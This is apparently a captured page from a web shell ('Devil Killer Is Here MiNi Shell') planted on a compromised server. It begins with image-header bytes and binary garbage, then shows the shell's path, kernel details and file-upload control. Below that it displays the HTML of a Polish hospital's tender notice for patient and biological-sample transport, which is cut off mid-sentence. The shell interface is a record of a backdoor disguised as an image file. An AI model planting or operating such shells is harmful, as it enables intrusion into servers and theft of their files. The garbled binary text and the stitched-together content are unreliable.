JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240328/0026434501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług z zakresu transportu sanitarnego na rzecz osób ubezpieczonych, innych uprawnionych oraz przewóz materiału biologicznego z siedziby Zamawiającego do miejsca docelowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY SZPITAL KLINICZNY IM. PROF. ADAMA GRUCY CENTRUM MEDYCZNEGO KSZTAŁCENIA PODYPLOMOWEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000290156</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Konarskiego 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Otwock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@spskgruca.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://spskgrucy.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług z zakresu transportu sanitarnego na rzecz osób ubezpieczonych, innych uprawnionych oraz przewóz materiału biologicznego z siedziby Zamawiającego do miejsca docelowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3e1641f4-ecf6-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00264345</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://spskgruca.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie<br/>oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej lub postaci elektronicznej za<br/>pośrednictwem Platformy eZamawiajacy<br/>2. System jest dostępny pod adresem: https://spskgruca.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Przeglądanie i pobieranie publicznej<br/>treści dokumentacji postępowania nie wymaga posiadania konta w Systemie, ani logowania do Systemu.<br/>5. Za pośrednictwem posiadanego w Systemie konta odbywa się komunikacja Wykonawcy z Zamawiającym w postępowaniu, w<br/>szczególności: przekazywanie dokumentów, oświadczeń, informacji, w ramach postępowania.<br/>6. Zadawanie pytań przez Wykonawców odbywa się przez opcję „Zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. W celu<br/>zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna,<br/>w którym należy uzupełnić dane Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym<br/>kodem weryfikującym z obrazka Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania<br/>poprzez komunikat systemowy &#34;Pytanie wysłane&#34;<br/>7. Po otwarciu ofert, komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia<br/>oraz informacje, przekazywane są w formie elektronicznej (czyli opatrzoną podpisem kwalifikowanym) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym za pośrednictwem Platformy, w zakładce „Korespondencja”. Za datę<br/>wpływu oświadczeń, wniosków, zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>‘’Korespondencja”<br/>8. Wszelka dokumentacja dotycząca postępowania o charakterze ogólnodostępnym i informacyjnym publikowana jest na Platformie<br/>w zakładce „Dokumentacja”<br/>9. Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/>9.1. dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>9.2. dokumenty w formacie innym niż „pdf”, należy podpisywać formatem XAdES, wtedy będzie wymagany oddzielny plik z<br/>podpisem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Ogólnego Rozporządzenia o Ochronie Danych (RODO) informujemy,<br/>że:<br/>1. Administratorem danych osobowych Wykonawców biorących udział w postępowaniu o udzielenie zamówienia publicznego jest<br/>Samodzielny Publiczny Szpital Kliniczny im. prof. Adama Grucy CMKP, ul. Konarskiego 13, 05-400 Otwock.<br/>2. Administrator wyznaczył Inspektora Ochrony Danych, z którym można się kontaktować w sprawach przetwarzania danych<br/>osobowych za pośrednictwem poczty elektronicznej iod@spskgruca.pl<br/>3. Administrator będzie przetwarzał dane osobowe na podstawie art. 6 ust. 1 lit. c RODO w zw. z ustawą z dnia 11 września 2019 r.<br/>– Prawo zamówień publicznych (Pzp) w celu związanym z prowadzonym postępowaniem o udzielenie zamówienia publicznego.<br/>4. Dane osobowe mogą być udostępnione innym uprawnionym podmiotom, na podstawie przepisów prawa, a także podmiotom, z<br/>którymi Administrator zawarł umowę w związku z realizacją usług na rzecz Administratora (np. kancelarią prawną, dostawcą<br/>oprogramowania, zewnętrznym audytorem). Odbiorcami danych będą także osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych<br/>(Pzp).<br/>5. Administrator nie zamierza przekazywać danych osobowych do państwa trzeciego lub organizacji międzynarodowej.<br/>6. Przysługuje prawo uzyskać kopię swoich danych osobowych w siedzibie Administratora.<br/>7. Dane osobowe będą przetwarzane przez okres wskazany w ustawie Pzp albo w przypadku zamówień realizowanych w ramach<br/>projektów (np. współfinansowanych ze środków Unii Europejskiej) przez okres wskazany w wytycznych w zakresie kwalifikowalności<br/>wydatków.<br/>8. Osobie, której dane dotyczą przysługuje prawo dostępu do treści swoich danych, ich sprostowania lub ograniczenia<br/>przetwarzania, a także prawo do wniesienia skargi do organu nadzorczego, tj. Prezesa Urzędu Ochrony Danych Osobowych, przy<br/>czym:<br/>a) W przypadku obowiązków wynikających z art. 15 ust. 1-3 RODO zamawiający ma prawo żądać od osoby, której dane dotyczą<br/>wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia;<br/>b) Skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą oraz<br/>nie może naruszać integralności protokołu oraz jego załączników;<br/>c) Prawo do ograniczenia przetwarzania danych osobowych nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania. Prawo do ograniczenia przetwarzania danych osobowych nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej w celu ochrony praw innej osoby fizycznej i prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>9. Podanie danych osobowych jest dobrowolne, jednakże niezbędne do przeprowadzenia postępowaniem o udzielenie zamówienia<br/>publicznego. Konsekwencje niepodania danych określa ustawa Pzp.<br/>10. Administrator nie podejmuje decyzji w sposób zautomatyzowany w oparciu o podane dane osobowe.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.26.39.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług z zakresu transportu sanitarnego osób, materiałów biologicznych i<br/>materiałów wykorzystywanych do udzielania świadczeń zdrowotnych, wymagających specjalnych warunków transportu.<br/>Dokładny opis przedmiotu zamówienia znajduje się w<br/>SWZ rozdział III oraz załączniku nr 1 do swz -formularzu ofertowym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze i ocenianiu ofert uznanych za ważne, Zamawiający będzie się kierował kryterium –<br/>K1 - cena ofertowa (brutto) -60%<br/>K2- czas dojazdu pojazdu – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Wg kolejności </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas dojazdu pojazdu</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) Spełniają warunki udziału w postępowaniu dotyczące:<br/>a) zdolności technicznej lub zawodowej<br/>Warunek A<br/>Dla uznania, że wykonawca spełnia powyższy warunek zamawiający żąda by wykazał, że dysponuje co najmniej dwoma<br/>kierowcami posiadającymi odpowiednie kwalifikacje zawodowe t. j.<br/>􀀀 uprawnienia do prowadzenia pojazdów uprzywilejowanych*<br/>(*zezwolenie do prowadzenia pojazdów uprzywilejowanych - wymóg przedstawienia dokumentu przed zawarciem umowy)<br/>Warunek B<br/>Dla uznania, że wykonawca spełnia powyższy warunek zamawiający żąda by wykazał, że dysponuje co najmniej dwoma<br/>pojazdami do transportu pacjentów spełniającymi normę: min PN- EN 1789 +A– min „Typ A: ambulans do transportu<br/>pacjentów - ambulans drogowy skonstruowany i wyposażony do transportu pacjentów” oraz posiadające aktualne:<br/>􀀀 deklarację zgodności - wymóg przedstawienia dokumentu przed zawarciem umowy<br/>􀀀 świadectwo homologacji pojazdu skompletowanego (samochód bazowy wraz z zabudową medyczną) - wymóg<br/>przedstawienia dokumentu przed zawarciem umowy<br/>􀀀 zaświadczenie stacji kontroli pojazdów upoważnionej do przeprowadzania badań technicznych pojazdów o<br/>przeprowadzeniu badań technicznych przed dopuszczeniem do ruchu pojazdu uprzywilejowanego zgodnie z ustawą o ruchu<br/>drogowym - wymóg przedstawienia dokumentu przed zawarciem umowy<br/>b) sytuacji ekonomicznej<br/>Warunek C<br/>Dla uznania, że Wykonawca spełnia powyższy warunek zobowiązany jest wykazać się posiadaniem aktualnego<br/>ubezpieczenia od odpowiedzialności cywilnej za szkody wyrządzone w związku z udzielaniem świadczeń objętych<br/>przedmiotem zamówienia z sumą gwarancyjną nie mniejszą niż 500.000,00 zł (pięćset tysięcy złotych).<br/>UWAGA:<br/>Do przeliczenia na PLN wartości wskazanej w dokumentach złożonych na potwierdzenie spełniania warunków udziału w<br/>postępowaniu, wyrażonej w walutach innych niż PLN, Zamawiający przyjmie średni kurs publikowany przez Narodowy Bank<br/>Polski z dnia wszczęcia postępowania.<br/>W przypadku polisy zbiorczej dotyczącej więcej niż jednego podmiotu poza wykonawcą suma gwarancyjna polisy musi<br/>zabezpieczać wartość minimalną wskazaną w/w warunku w stosunku do wykonawcy ubiegającego się o udzielenie<br/>zamówienia – zamawiający wymaga jednoznacznych postanowień określających wartość sumy gwarancyjnej dedykowanej<br/>wykonawcy.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższe dotyczy każdego z nich odrębnie.<br/>2. Zamawiający, może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze może mieć<br/>negatywny wpływ na realizację zamówienia.<br/>3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa w rozdz.<br/>V.1.1)a), b) niniejszej SWZ zostaną spełnione wyłącznie, jeżeli:<br/>w zakresie zdolności technicznej odnoszącej się do dysponowania odpowiednim potencjałem osobowym (WARUNEK A)<br/>wykonawcy wspólnie ubiegający się o udzielnie zmówienia mogą sumować zasoby osobowe. Wykonawca, który wykaże się<br/>wymaganymi kompetencjami, będzie zobowiązany do świadczenia usługi w/w zakresie.<br/>zakresie zdolności technicznej odnoszącej się do dysponowania odpowiednim potencjałem technicznym (WARUNEK<br/>B) wykonawcy wspólnie ubiegający się o udzielnie zmówienia mogą sumować potencjał techniczny. Wykonawca, który<br/>wykaże się wymaganym potencjałem technicznym, będzie zobowiązany do świadczenia usługi w/w zakresie.<br/>􀀀 w zakresie zdolności ekonomicznej (WARUNEK C), każdy z Wykonawców wspólnie ubiegających się o udzielnie<br/>zamówienia musi posiadać polisę, potwierdzającą wartość wymaganą przez Zamawiającego, jednocześnie będąc<br/>podmiotem świadczącym zamówienie na rzecz zamawiającego.<br/>Zamawiający informuje, że Wykonawca może okazać się polisą zbiorczą, z zastrzeżeniem, że kwota gwarancyjna polisy<br/>określonej przez Zamawiającego musi potwierdzać wartość wymaganej sumy gwarancyjnej w odniesieniu do Wykonawcy<br/>lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do każdego nich, tj. 500 000,00 zł.<br/>4. Wykonawca może w celu spełnienia warunków udziału w postępowaniu, o których mowa w rozdz. VI.1.1) lit. a) niniejszej<br/>SWZ w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części polegać na zdolnościach<br/>technicznych lub zawodowych podmiotów udostępniających zasoby niezależnie od charakteru prawnego łączących go z<br/>nimi stosunków prawnych.<br/>5. Zamawiający informuje, iż „stosowna sytuacja”, o której mowa w rozdz. VI. 4 niniejszej SWZ wystąpi wyłącznie w<br/>przypadku, kiedy:<br/>1) Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby udowodni zamawiającemu, że realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając wraz z ofertą<br/>zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub<br/>inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>2) Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w ust. 1, winno potwierdzać, że stosunek łączący<br/>wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określać w<br/>szczególności:<br/>a) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących kwalifikacji zawodowych zrealizuje usługi, których wskazane zdolności<br/>dotyczą.<br/>7) Zamawiający oceni, czy zasoby udostępniane wykonawcy przez inne podmioty, pozwalają na wykazanie przez<br/>wykonawcę spełnienie warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy<br/>wykluczenia, o których mowa w art. art. 108 ust. 1 ustawy PZP art. 109 ust. 1pkt. 4 ustawy PZP oraz art. 7 ust. Ustawy<br/>sankcyjnej Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykazaniu braku podstaw do wykluczenia z postępowania -<br/>wg wzoru stanowiącego załącznik nr 2 do SWZ.<br/>3. Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia w zakresie wskazanym w art. 7 ust. 1 Ustawy<br/>sankcyjnej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">O udzielenie zamówienia<br/>mogą ubiegać się Wykonawcy, którzy:<br/>1) Nie podlegają wykluczeniu na podstawie:<br/>a) art. 108 ust. 1 ustawy PZP<br/>b) art. 109 ust. 1pkt. 4,5,6,7,8,9,10 ustawy PZP:<br/>c) art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego zw. Ustawą sankcyjną<br/>(W przypadku, Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z Wykonawców musi wykazać brak<br/>podstaw do wykluczenia)<br/>2.2. Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia w zakresie wskazanym w pkt V SWZ<br/>1) Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykazaniu braku podstaw do wykluczenia z postępowania -<br/>wg wzoru stanowiącego załącznik nr 2 do SWZ.<br/>2.3. Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia w zakresie wskazanym w pkt V SWZ składane<br/>przez Wykonawcę mający siedzibę poza granicami Rzeczypospolitej Polskiej<br/>1) Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykazaniu braku podstaw do wykluczenia z postępowania -<br/>wg wzoru stanowiącego załącznik nr 2 do SWZ.<br/>2.4. Podmiotowe środki dowodowe dotyczące podmiotów na zasoby, których powołuje się Wykonawca 1) Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykazaniu braku podstaw do wykluczenia z postępowania -<br/>wg wzoru stanowiącego załącznik nr 2 do SWZ.<br/>3. Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia w zakresie wskazanym w art. 7 ust. 1 Ustawy<br/>sankcyjnej<br/>1) Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz wykazaniu braku podstaw do wykluczenia z postępowaniu -<br/>wg wzoru stanowiącego załącznik nr 2 do SWZ.<br/>4. Weryfikacja podstaw wykluczenia, o których mowa w 7 ust. 1 Ustawy 